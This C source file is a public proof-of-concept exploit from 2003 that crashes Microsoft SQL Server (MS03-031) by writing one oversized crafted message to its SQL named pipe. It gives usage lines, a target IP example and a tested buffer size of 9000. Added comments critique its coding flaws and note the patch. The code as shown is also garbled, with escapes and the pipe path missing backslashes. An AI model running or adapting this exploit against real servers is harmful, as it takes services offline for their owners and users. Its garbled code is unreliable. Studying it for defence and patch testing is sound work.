
# Title : MS Windows SQL Server Denial of Service Remote Exploit (MS03-031)
# Published : 2003-07-25
# Author : refdom


////////////////////////////////////////////////////////////////
//      
//      Microsoft SQL Server DoS Remote Exploit (MS03-031)
//                    By refdom of xfocus
//    
////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


/*
 * Print the tool's banner and usage text to stdout. main() calls this
 * unconditionally before any argument checking, so it appears on every run.
 * Each line is written verbatim; in this copy the trailing "n" reads as a
 * literal character rather than a "\n" escape (apparently lost in extraction).
 */
void Usage()
{
	static const char *const kBanner[] = {
		"******************************************n",
		"exp for Microsoft SQL Server DoS(MS03-031)nn",
		"t Written by Refdomn",
		"t Email: refdom xfocus orgn",
		"t Homepage: www.xfocus.orgnn",
		"Usage: DOSMSSQL.exe server buffersizen",
		"eg: DOSMSSQL.exe192.168.0.1 9000nn",
		"The buffersize depends on service pack level.n",
		"I test it on my server: windows 2000, mssqlserver no sp.n",
		"when buffersize is 9000, the server can be crashed.n",
		"n",
		"*******************************************nn",
	};
	size_t i;

	/* fputs writes each string unchanged; none of them contains a '%', so
	 * the output is byte-for-byte what the printf calls produced. */
	for (i = 0; i < sizeof kBanner / sizeof kBanner[0]; i++)
	{
		fputs(kBanner[i], stdout);
	}
}


/*
 * Entry point. Builds a named-pipe path from argv[1], allocates a buffer of
 * argv[2] + 2 bytes, opens the pipe as a client and writes one message of
 * argv[2] + 1 bytes to it. This is the MS03-031 DoS the banner describes;
 * the server-side fix is the MS03-031 update itself. Every exit, including
 * the error exits, goes through Exit0 and returns 0, so the process exit
 * status never reports failure.
 */
int main(int argc, char* argv[])
{
	char lpPipeName[50];              // pipe path, filled by sprintf below
	char *lpBuffer = NULL;            // message body, allocated once ulSize is known
	unsigned long ulSize = 0;         // byte count parsed from argv[2]

	BOOL bResult;
	DWORD dwWritten = 0, dwMode;
	HANDLE hPipe;                     // never closed on any path (see Exit0)

	Usage();

	// NOTE: the trailing "n" in this and the later format strings reads as a
	// literal character in this copy; presumably "\n" lost its backslash in
	// extraction.
	printf("Starting...n");

	if (argc != 3)
		goto Exit0;                   // silent exit: nothing printed beyond the banner
	
	// Length-only check on the server name: it bounds what sprintf writes
	// into the 50-byte lpPipeName but does not validate the content of
	// argv[1]. As written the format literal contains \p, \s and \q, which
	// are not C escapes; the intended path appears to have lost backslashes
	// in extraction. strlen/memset are used with no <string.h> include —
	// presumably reached through <windows.h>.
	if (strlen(argv[1]) < 20)
	{
		sprintf(lpPipeName, "\\%s\\.\pipe\sql\query", argv[1]);
	}
	else
	{
		printf("Error!servern");
		goto Exit0;
	}

	// atol() reports no errors: non-numeric input yields 0, and a negative
	// value converts to a very large unsigned long, so ulSize + 2 below can
	// wrap. strtoul() with an endptr/ERANGE check would make both detectable.
	ulSize= atol(argv[2]);

	lpBuffer = (char*)malloc(ulSize + 2);   // the cast is unnecessary in C
	if (NULL == lpBuffer)
	{
		printf("malloc error!n");
		goto Exit0;
	}

	// Zero the whole allocation, fill the first ulSize bytes with 'A', then
	// overwrite bytes 0..2. As written 'x12' etc. are multi-character
	// constants with implementation-defined values; they look like
	// '\x12'-style escapes whose backslashes were lost in extraction.
	// If ulSize is 0 or 1 the allocation is only ulSize + 2 bytes and the
	// store to index 2 is out of bounds — there is no lower bound on argv[2].
	memset(lpBuffer, 0, ulSize + 2);
	memset(lpBuffer, 'A', ulSize);
	*lpBuffer = 'x12';
	*(lpBuffer + 1) = 'x01';
	*(lpBuffer + 2) = 'x00';
	
	printf("Connecting Server...n");

	// Open the pipe as a client for read+write; OPEN_EXISTING fails unless
	// the server end is already listening.
	hPipe = CreateFile(lpPipeName, 
					GENERIC_READ | GENERIC_WRITE,
					0,
					NULL,
					OPEN_EXISTING,
					0,
					NULL);
	if (INVALID_HANDLE_VALUE == hPipe)
	{
		// GetLastError() returns a DWORD (unsigned long); "%d" does not match
		// it, "%lu" would. The same mismatch is on the two error paths below.
		printf("Error!Connect server!%dn", GetLastError());
		goto Exit0;
	}

   dwMode = PIPE_READMODE_MESSAGE; 
   bResult = SetNamedPipeHandleState( 
      hPipe,    // pipe handle 
      &dwMode,  // new pipe mode 
      NULL,     // don't set maximum bytes 
      NULL);    // don't set maximum time 
   if (!bResult)
   {
		printf("Error!SetNamedPipeHandleState.%dn", GetLastError());
		goto Exit0;               // hPipe is leaked here and on every later path
   }

	// One write of ulSize + 1 bytes: the 'A'-filled region (with its first
	// three bytes replaced above) plus one of the trailing zero bytes left by
	// the first memset. Nothing is read back; a failed WriteFile is taken as
	// the sign that the server went down, which is the only observable the
	// tool reports. From the defender's side this is a single oversized
	// message on the SQL named pipe from an unauthenticated client.
	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);

	if (!bResult)
	{
		printf("ntError!WriteFile.%dnn", GetLastError());
		printf("When see the error message, the target may be crashed!!nn");
		goto Exit0;
	}

Exit0:
	// Neither CloseHandle(hPipe) nor free(lpBuffer) is called; process exit
	// reclaims both, but this label is where the cleanup belongs, and the
	// constant 0 hides which path was taken.
	
	return 0;
}
